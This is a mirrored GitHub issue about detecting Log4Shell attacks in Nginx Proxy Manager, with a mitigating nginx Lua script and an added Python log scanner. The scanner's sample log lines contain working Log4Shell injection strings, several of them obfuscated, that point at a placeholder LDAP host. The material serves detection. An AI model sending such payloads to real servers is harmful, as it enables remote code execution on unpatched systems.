[GH-ISSUE #1655] Log4j Header recognition #1239

Closed
opened 2026-02-26 06:36:21 +03:00 by kerem · 1 comment

Originally created by @lvefferen on GitHub (Dec 15, 2021).
Original GitHub issue: https://github.com/NginxProxyManager/nginx-proxy-manager/issues/1655

Can Nginx Proxy Manager detect (and block) scans/attacks done with the Log4j exploit by enabling the "Block Common Exploits" option?

kerem closed this issue and added the question label 2026-02-26 06:36:21 +03:00

@chaptergy commented on GitHub (Dec 15, 2021):

You can add something via the advanced config to temporarily try and reduce the risk. However, this should NOT be more than a very temporary workaround until you have patched your Java applications! That's why this shouldn't be a default "exploit" to block. Furthermore, as every single header and other content needs to be scanned for various specific strings, and this is only possible by using a Lua script, this comes with a huge performance penalty.

But as I said, for a temporary thing, you can use the advanced config and use a script [like the one created by infiniroot](https://www.infiniroot.com/blog/1155/using-nginx-lua-script-mitigate-log4shell-cve-2021-44228-vulnerability):

```lua
# LUA block to detect, block and log Log4Shell attacks (C) Infiniroot 2021 (@infiniroot)
# with lua fixes and other enhancements from Andreas Nanko (@andreasnanko)
rewrite_by_lua_block {

-- Recursively strip Log4j lookup obfuscation until the value stops changing,
-- then return it lowercased so the caller can search for "{jndi:".
local function decipher(v)
    local s = tostring(v)
    s = ngx.unescape_uri(s)
    if string.find(s, "${base64:", 1, true) then
      -- Decode each ${base64:...} lookup in place. A function replacement avoids
      -- decoding the whole value at once and keeps "%" in decoded data literal;
      -- a nil result (invalid base64) leaves the lookup unchanged.
      s = string.gsub(s, "${base64:([%w+/=]+)}", function(b)
        return ngx.decode_base64(b)
      end)
    end
    s = string.gsub(s, "${lower:(%a+)}", "%1")
    s = string.gsub(s, "${upper:(%a+)}", "%1")
    s = string.gsub(s, "${env:[%a_-]+:%-([%a:])}", "%1")
    s = string.gsub(s, "${::%-(%a+)}", "%1")
    if string.lower(s) == string.lower(tostring(v)) then
      return string.lower(s)
    else
      return decipher(s)
    end
end

local h, err = ngx.req.get_headers()
if err then
  -- err is "truncated" when the request has more headers than were parsed
  ngx.log(ngx.ERR, "error: ", err)
end
for k, v in pairs(h) do
  -- A header sent more than once arrives as a table of values; join them
  -- so every value is scanned instead of the string "table: 0x...".
  local value = type(v) == "table" and table.concat(v, ", ") or tostring(v)
  if string.match(decipher(value), "{jndi:") then
    ngx.log(ngx.ERR, 'Found potential log4j attack in header ' .. k .. ':' .. value)
    ngx.exit(ngx.HTTP_FORBIDDEN)
  end
end

-- Scan the raw request line (path and query string) as well
local uri = tostring(ngx.var.request_uri)
if string.match(decipher(uri), "{jndi:") then
  ngx.log(ngx.ERR, 'Found potential log4j attack in request: ' .. uri)
  ngx.exit(ngx.HTTP_FORBIDDEN)
end
}
```
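An added example, not part of the issue or of Infiniroot's script: a Python port of the same normalization steps, run over access-log lines to find past requests the Lua block would have flagged. The function names, the sample log lines and the `example.invalid` host are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# The four non-base64 rewrites from the Lua script, as regexes.
LOOKUPS = [re.compile(p) for p in (
    r"\$\{lower:([A-Za-z]+)\}",
    r"\$\{upper:([A-Za-z]+)\}",
    r"\$\{env:[A-Za-z_-]+:-([A-Za-z:])\}",
    r"\$\{::-([A-Za-z]+)\}",
)]
BASE64 = re.compile(r"\$\{base64:([A-Za-z0-9+/=]+)\}")  # full base64 alphabet

def _decode(match):
    try:
        return base64.b64decode(match.group(1), validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return match.group(0)  # not valid base64: leave the lookup untouched

def decipher(s, max_rounds=20):
    """URL-decode and collapse lookups until stable (bounded); return lowercase."""
    for _ in range(max_rounds):
        before = s
        s = BASE64.sub(_decode, unquote(s))
        for pattern in LOOKUPS:
            s = pattern.sub(lambda m: m.group(1), s)
        if s == before:
            break
    return s.lower()

def flag_lines(lines):
    """Return 1-based numbers of the lines that normalize to contain '{jndi:'."""
    return [n for n, line in enumerate(lines, 1) if "{jndi:" in decipher(line)]

# Constructed sample access-log lines (documentation IPs, example.invalid host).
_B64 = base64.b64encode(b"jndi:ldap://example.invalid/a").decode()
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Dec/2021:10:00:02 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 200 "-" "-"',
    '203.0.113.9 - - [15/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:ldap://example.invalid/a}"',
    '203.0.113.9 - - [15/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://example.invalid/a}"',
    '203.0.113.9 - - [15/Dec/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${${base64:' + _B64 + '}}"',
    '203.0.113.7 - - [15/Dec/2021:10:00:06 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for n in flag_lines(SAMPLE_LOG):
        print(f"line {n}: {SAMPLE_LOG[n - 1]}")
```

A hit here only means the request carried a lookup string; whether it reached a vulnerable Java application still has to be checked on the backend.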